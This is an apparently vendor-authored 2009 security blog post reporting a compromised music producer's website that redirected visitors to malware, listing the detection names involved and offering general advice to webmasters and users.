Compromised websites are a sad fact of life on the Internet today, and here’s proof. Last week the website of a major British music producer was compromised, and stayed that way for at least several days. The site is now clean (last checked July 31, 2009) but the lessons to be learned from it remain relevant.
The site was compromised with a script that sent users to a domain identified by Trend Micro researchers as a known disease vector, as shown in this NoScript window captured by Senior Security Analyst Rik Ferguson:
The compromised pages themselves were detected as HTML_YBLOD.A, but the payload onto the affected system was a varied lot, including the following malware: BKDR_RUSTOCK.GM, BKDR_RUSTOCK.ER, TROJ_PATCHED.P, TROJ_PATCHER.AM, and TROJ_TEDROO.E. Any one of these would have been enough to give users problems, but having this much malware arrive through just one vector just illustrates how serious a threat having a compromised website can be–both for users and website owners.
Ultimately, the burden falls primarily on webmasters to properly secure their websites: best practices such as updating software packages and using strong passwords are a must today. Users must also take care when browsing–being on a known legitimate site is no guarantee of safety.
Trend Micro Smart Protection Network protects users from similar attacks by detecting the website harboring the script as HTML_YBLOD.A (as long as the script is still in the pages’ source codes), and blocking access to malicious URLs.